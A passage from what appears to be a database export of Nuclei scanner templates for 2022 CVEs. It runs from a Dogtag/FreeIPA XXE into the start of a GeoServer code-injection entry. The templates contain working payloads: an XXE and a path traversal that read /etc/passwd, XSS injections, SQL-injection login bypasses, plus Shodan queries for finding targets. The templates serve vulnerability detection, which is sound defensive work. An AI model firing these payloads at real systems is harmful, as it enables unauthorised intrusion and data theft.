shodan-query: title:\"Identity Management\" html:\"FreeIPA\"\n fofa-query: title=\"Identity Management\"\n tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki\n\nhttp:\n - raw:\n - |\n POST /ca/rest/certrequests HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n <!--?xml version=\"1.0\" ?-->\n <!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n <CertEnrollmentRequest>\n <Attributes/>\n <ProfileID>&ent;</ProfileID>\n </CertEnrollmentRequest>\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: word\n part: body\n words:\n - \"PKIException\"\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: status\n status:\n - 400\n# digest: 490a0046304402203e01a48643ddc4111a52d8b34ca90c1d803678990761a21ea7e52dbdcf384f87022053892bd3048fc94077b0f1d151dfade945c5ee5c9fa857c5d0203eca2a47d1cf:922c64590222798bb761d5b6d8e72950", "hash": 
"8cb92814d2ef3676770bde22be7177af", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b8" }, "name": "CVE-2022-24181.yaml", "content": "id: CVE-2022-24181\n\ninfo:\n name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting\n author: lucasljm2001,ekrause\n severity: medium\n description: |\n PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to a patched version of PKP Open Journal Systems (OJS) or apply the necessary security patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/50881\n - https://github.com/pkp/pkp-lib/issues/7649\n - https://youtu.be/v8-9evO2oVg\n - https://nvd.nist.gov/vuln/detail/cve-2022-24181\n - https://github.com/comrade99/CVE-2022-24181\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-24181\n cwe-id: CWE-79\n epss-score: 0.0017\n epss-percentile: 0.53018\n cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: public_knowledge_project\n product: open_journal_systems\n tags: cve,cve2022,xss,oss,pkp-lib,edb,public_knowledge_project\n\nhttp:\n - raw:\n - |\n GET /iupjournals/index.php/esj HTTP/2\n Host: {{Hostname}}\n X-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<script>alert(document.domain)</script><x=\".com/iupjournals'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
490a004630440220721e675de3dfc8d686deef9d08aa4b511d181ddc1b2d2414d399c6fc0b7984c90220107c7012882d3600ad1a48e96140bd2a811ddc33de21a89217727ff2dab20346:922c64590222798bb761d5b6d8e72950", "hash": "2de8ca08bf99b5a2a0b134a4a75f18d5", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b9" }, "name": "CVE-2022-24223.yaml", "content": "id: CVE-2022-24223\n\ninfo:\n name: Atom CMS v2.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version Atom CMS v2.1\n reference:\n - https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html\n - https://github.com/thedigicraft/Atom.CMS/issues/255\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24223\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/Enes4xd/Enes4xd\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-24223\n cwe-id: CWE-89\n epss-score: 0.27442\n epss-percentile: 0.96689\n cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thedigitalcraft\n product: atomcms\n tags: cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /admin/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n email={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")'\n condition: and\n# digest: 
4b0a00483046022100b30222427f9ffd0bdc3e9c961d2d43e58bcaaa1c01926b6710eb7a2c2eec31a2022100f35d98eab9372172d960a8d2af85b2b0160b92776eb2f797098acd5ee6cd32fd:922c64590222798bb761d5b6d8e72950", "hash": "562a6dd00b6b2b5c563a99fd340d659e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ba" }, "name": "CVE-2022-24260.yaml", "content": "id: CVE-2022-24260\n\ninfo:\n name: VoipMonitor - Pre-Auth SQL Injection\n author: gy741\n severity: critical\n description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the SQL injection vulnerability in the VoipMonitor application.\n reference:\n - https://kerbit.io/research/read/blog/3\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24260\n - https://www.voipmonitor.org/changelog-gui?major=5\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-24260\n cwe-id: CWE-89\n epss-score: 0.28138\n epss-percentile: 0.96726\n cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: voipmonitor\n product: voipmonitor\n shodan-query: http.title:\"VoIPmonitor\"\n tags: cve,cve2022,voipmonitor,sqli,unauth\n\nhttp:\n - raw:\n - |\n POST /api.php HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n module=relogin&action=login&pass=nope&user=a' UNION SELECT 
'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\"success\":true'\n - '_vm_version'\n - '_debug'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: kval\n kval:\n - PHPSESSID\n# digest: 4a0a0047304502205c7937f2712f6a6ba6b8e7005ee21d6e468bad7ca3c51d3878893ccef2720a70022100df3fc30f43920379b57b786480242a3d9d051c85c91ed906d1aff9421526d413:922c64590222798bb761d5b6d8e72950", "hash": "06a886e51e98796dc49245788b750e0b", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084bb" }, "name": "CVE-2022-24264.yaml", "content": "id: CVE-2022-24264\n\ninfo:\n name: Cuppa CMS v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24264\n - https://github.com/truonghuuphuc/CVE\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/Nguyen-Trung-Kien/CVE-1\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24264\n cwe-id: 
CWE-89\n epss-score: 0.04717\n epss-percentile: 0.91844\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms\nvariables:\n num: '999999999'\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n POST /components/table_manager/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n search_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - '{{md5(num)}}'\n - 'td_available_languages'\n condition: and\n\n - type: word\n part: header_2\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220736b8973074f85183b4bb813328ec1a114f2ad79d996268f1acae2f5b6faae9f02202b55ebe13f22c216f153f5fd564e50bcbd4499dd04d0e794c9030858c860bed1:922c64590222798bb761d5b6d8e72950", "hash": "b0b5bdaf8fcf4b47e78473dae509ee5c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084bc" }, "name": "CVE-2022-24265.yaml", "content": "id: CVE-2022-24265\n\ninfo:\n name: Cuppa CMS v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.\n reference:\n - 
https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24265\n - https://github.com/truonghuuphuc/CVE\n - https://github.com/Nguyen-Trung-Kien/CVE-1\n - https://github.com/oxf5/CVE\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24265\n cwe-id: CWE-89\n epss-score: 0.05054\n epss-percentile: 0.92726\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: cuppacms\n product: cuppacms\n tags: cve2022,cve,sqli,cuppa,authenticated,cuppacms\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n @timeout: 20s\n POST /components/menu/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n path=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"menu/html/edit.php\")'\n condition: and\n# digest: 4b0a00483046022100ef926993f56df3d6024e815c648f1444430a5c25d5001fa418f66bc26b3f9961022100c18f80d30dbafc9c6af9bcadca69526a5ee1ba114d5c6ec9aa22599cf01ebcc3:922c64590222798bb761d5b6d8e72950", "hash": "eb27d1eff5e2e9ee879f790d16e152c1", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084bd" }, "name": "CVE-2022-24266.yaml", "content": "id: CVE-2022-24266\n\ninfo:\n name: Cuppa CMS v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, 
and potential compromise of the entire system.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24266\n - https://github.com/CuppaCMS/CuppaCMS/issues/17\n - https://github.com/truonghuuphuc/CVE\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24266\n cwe-id: CWE-89\n epss-score: 0.03412\n epss-percentile: 0.91229\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n @timeout: 20s\n POST /components/table_manager/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n order_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"list_admin_table\")'\n condition: and\n# digest: 4a0a00473045022001af995ffcc1fd2b4e63125802fda7806a8bda33d6cde6d71b11627458173c3b022100c28812270e59082397fb8f39eae1d431ad18f591da96014bfaf17017f0691a1f:922c64590222798bb761d5b6d8e72950", "hash": "a826dbec9fdf3742274e94d0eff820c2", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084be" }, "name": "CVE-2022-24288.yaml", "content": "id: CVE-2022-24288\n\ninfo:\n name: Apache Airflow OS Command Injection\n author: xeldax\n severity: high\n description: Apache Airflow prior to 
version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Apache Airflow.\n reference:\n - https://github.com/advisories/GHSA-3v7g-4pg3-7r6j\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24288\n - https://lists.apache.org/thread/dbw5ozcmr0h0lhs0yjph7xdc64oht23t\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Hax0rG1rl/my_cve_and_bounty_poc\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-24288\n cwe-id: CWE-78\n epss-score: 0.81676\n epss-percentile: 0.98279\n cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: apache\n product: airflow\n shodan-query: title:\"Airflow - DAGs\" || http.html:\"Apache Airflow\"\n tags: cve,cve2022,airflow,rce,apache\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command\"\n - \"{{BaseURL}}/code?dag_id=example_passing_params_via_test_command\"\n\n stop-at-first-match: true\n matchers:\n - type: word\n words:\n - 'foo was passed in via Airflow CLI Test command with value {{ params.foo }}' # Works with unauthenticated airflow instance\n# digest: 4a0a00473045022014c9c4b7a70a69fdf977286bc7aabdd64059d785bff999619c167ab3393355120221008cdca1281271d3ca5ea873f99082667f92c1aff3d825665947813512c6113339:922c64590222798bb761d5b6d8e72950", "hash": "2b0327f75ef0b2b064321209d887775a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084bf" }, "name": "CVE-2022-24384.yaml", "content": "id: CVE-2022-24384\n\ninfo:\n name: SmarterTools SmarterTrack - 
Cross-Site Scripting\n author: E1A\n severity: medium\n description: |\n Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by SmarterTools to fix this vulnerability.\n reference:\n - https://csirt.divd.nl/CVE-2022-24384\n - https://csirt.divd.nl/DIVD-2021-00029\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-24384\n cwe-id: CWE-79\n epss-score: 0.00084\n epss-percentile: 0.34937\n cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: smartertools\n product: smartertrack\n shodan-query: http.favicon.hash:1410071322\n tags: cve,cve2022,xss,smartertrack,smartertools\n\nhttp:\n - raw:\n - |+\n GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n words:\n - '\"type\":\"error\",\"text\":\"Unknown survey\\\"><img src=x onerror=alert(document.domain)>\"'\n - 'smartertrack'\n condition: and\n# digest: 4a0a00473045022100b4892f5c64f6232351379b197d1871d961f0b6c1bfe2c35aa9ec6b1fe287a6f202203f5de83f46a950369d103b2ff3e6f864c4508f0b7fbbef2ffdd5ae4281720fcc:922c64590222798bb761d5b6d8e72950", "hash": "c39d1d40cfef4062deb7584c5e790a6a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c0" }, "name": "CVE-2022-2462.yaml", "content": "id: CVE-2022-2462\n\ninfo:\n name: WordPress Transposh <=1.0.8.1 - Information Disclosure\n author: dwisiswant0\n severity: medium\n description: |\n WordPress Transposh plugin through is 
susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the target system.\n remediation: |\n Upgrade to the latest version of the WordPress Transposh plugin (>=1.0.8.2) to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/167878/wptransposh1081-disclose.txt\n - https://github.com/oferwald/transposh\n - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-2462\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2462\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-2462\n cwe-id: CWE-200\n epss-score: 0.02698\n epss-percentile: 0.90234\n cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: transposh\n product: transposh_wordpress_translation\n framework: wordpress\n tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php\"\n\n body: \"action=tp_history&token=&lang=en\" # we leave the value for 'token' with an empty string so it fetch all history\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"len(transposh) > 0\" # 'transposh' equivalent for Transposh header key\n\n - type: word\n part: body\n words:\n # because the query is `SELECT translated, 
translated_by, timestamp, source, user_login [...]`\n - \"translated\"\n - \"translated_by\"\n - \"timestamp\"\n - \"source\"\n - \"user_login\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206c6ee70b9245c089a3f406d01f902c54a26c406fac6592650e59faa6311584fd022100a14c1a73652a9999f953fa755658caed5c22d516cf51b10d0c18cfc8ca40e2d1:922c64590222798bb761d5b6d8e72950", "hash": "ce8818d3ffabc84caaddb573114767e8", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c1" }, "name": "CVE-2022-2467.yaml", "content": "id: CVE-2022-2467\n\ninfo:\n name: Garage Management System 1.0 - SQL Injection\n author: edoardottt\n severity: critical\n description: |\n Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Garage Management System 1.0.\n reference:\n - https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md\n - https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2467\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-2467\n cwe-id: CWE-89\n epss-score: 0.01309\n epss-percentile: 0.8445\n cpe: cpe:2.3:a:garage_management_system_project:garage_management_system:1.0:*:*:*:*:*:*:*\n 
metadata:\n verified: true\n max-request: 1\n vendor: garage_management_system_project\n product: garage_management_system\n tags: cve,cve2022,sourcecodester,garagemanagementsystem,sqli,garage_management_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(7)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n\n - type: word\n part: body\n words:\n - 'Garage Billing Software'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ffddfa5138b805871ea2a646da2d928f9d7c7e4984d7b39c4337da59dc6ffee00221008bb7119b74e219c4da7ebc1abe7299068e74ab28eb036cb85ad8ccdf44bea154:922c64590222798bb761d5b6d8e72950", "hash": "027d45165103fbc1436737fbce103a8d", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c2" }, "name": "CVE-2022-24681.yaml", "content": "id: CVE-2022-24681\n\ninfo:\n name: ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting\n author: Open-Sec\n severity: medium\n description: |\n ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary scripts or theft of sensitive information.\n remediation: |\n Upgrade to a version of ManageEngine ADSelfService Plus that is higher than 6121 to mitigate this vulnerability.\n reference:\n - https://raxis.com/blog/cve-2022-24681\n - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html\n - https://manageengine.com\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24681\n - https://www.manageengine.com/products/self-service-password/kb/CVE-2022-24681.html\n 
classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-24681\n cwe-id: CWE-79\n epss-score: 0.00155\n epss-percentile: 0.51848\n cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zohocorp\n product: manageengine_adselfservice_plus\n tags: cve,cve2022,manageengine,xss,authenticated,zohocorp\n\nhttp:\n - raw:\n - |\n POST /servlet/GetProductVersion HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(buildnumber, '< 6121')\n\n - type: word\n part: body\n words:\n - \"ManageEngine\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: buildnumber\n group: 1\n regex:\n - '\"BUILD_NUMBER\":\"([0-9]+)\",'\n internal: true\n part: body\n# digest: 4a0a00473045022100bb98caa57ec6e3ed65dcc5cfbfe03e4b587538e5e968b2097fac7c24343595bf022024df61662ad6dcdb68cd5e6cc916990b9854a8d8e027ac7f1651aee87880932c:922c64590222798bb761d5b6d8e72950", "hash": "4344dcaa4d8c83e51c609874768b9737", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c3" }, "name": "CVE-2022-24716.yaml", "content": "id: CVE-2022-24716\n\ninfo:\n name: Icinga Web 2 - Arbitrary File Disclosure\n author: DhiyaneshDK\n severity: high\n description: |\n Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.\n impact: |\n The vulnerability can lead to unauthorized access to sensitive information, potentially exposing credentials, configuration files, and other sensitive data.\n remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. 
Database credentials should be rotated.\n reference:\n - https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py\n - http://packetstormsecurity.com/files/171774/Icinga-Web-2.10-Arbitrary-File-Disclosure.html\n - https://github.com/Icinga/icingaweb2/commit/9931ed799650f5b8d5e1dc58ea3415a4cdc5773d\n - https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5p3f-rh28-8frw\n - https://security.gentoo.org/glsa/202208-05\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24716\n cwe-id: CWE-22\n epss-score: 0.25375\n epss-percentile: 0.96582\n cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: icinga\n product: icinga_web_2\n shodan-query: title:\"Icinga\"\n tags: cve,cve2022,packetstorm,icinga,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd\"\n - \"{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd\"\n - \"{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - text/plain\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c9539549dcfc756f1d0a2325969b03be5a4a019f130c94dca75be9859b0aa649022100dfa8df926228c77eb9d9593dcb7e8189e5d91eb3209ecf64297b5454a6c8cf88:922c64590222798bb761d5b6d8e72950", "hash": "d1e46d59282d7c6ea83878bec1cb25f0", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c4" }, "name": "CVE-2022-24816.yaml", "content": "id: CVE-2022-24816\n\ninfo:\n name: GeoServer <1.2.2 - Remote Code Execution\n author: mukundbhuva\n severity: critical\n description: |\n Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. 
The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.\n remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath.\n reference:\n - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html\n - https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx\n - https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24816\n - https://github.com/tanjiti/sec_profile\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-24816\n cwe-id: CWE-94\n epss-score: 0.86265\n 